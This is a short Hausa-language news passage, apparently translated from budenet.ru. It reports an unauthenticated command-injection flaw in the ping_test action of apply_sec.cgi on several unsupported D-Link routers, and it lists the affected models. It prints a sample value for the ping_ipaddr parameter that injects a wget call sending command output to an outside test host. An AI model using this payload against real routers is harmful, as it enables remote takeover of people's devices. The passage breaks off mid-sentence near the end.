A cikin D-Link mara waya ta hanyar sadarwa
Abin sha'awa, bisa ga masu haɓaka firmware, kiran "ping_test" ya kamata a yi shi ne kawai bayan an tabbatar da shi, amma a zahiri ana kiran shi a kowane hali, ba tare da la'akari da shiga cikin haɗin yanar gizon ba. Musamman, lokacin shiga cikin rubutun apply_sec.cgi da wuce sigar "action=ping_test", rubutun yana turawa zuwa shafin tabbatarwa, amma a lokaci guda yana aiwatar da aikin da ke da alaƙa da ping_test. Don aiwatar da lambar, an yi amfani da wani lahani a cikin ping_test kanta, wanda ke kiran ping utility ba tare da bincika daidai adireshin IP ɗin da aka aika don gwaji ba. Misali, don kiran mai amfani da wget da canja wurin sakamakon umarnin “echo 1234” zuwa mai masaukin baki, kawai saka siga “ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// test.test/?$( echo 1234)".
An tabbatar da kasancewar raunin a hukumance a cikin waɗannan samfuran:
- DIR-655 tare da firmware 3.02b05 ko fiye;
- DIR-866L tare da firmware 1.03b04 ko fiye;
- DIR-1565 tare da firmware 1.01 ko fiye;
- DIR-652 (babu bayani game da nau'ikan firmware masu matsala da aka bayar)
Lokacin tallafi na waɗannan samfuran ya riga ya ƙare, don haka D-Link
Daga baya an gano cewa raunin shima ya kasance
source: budenet.ru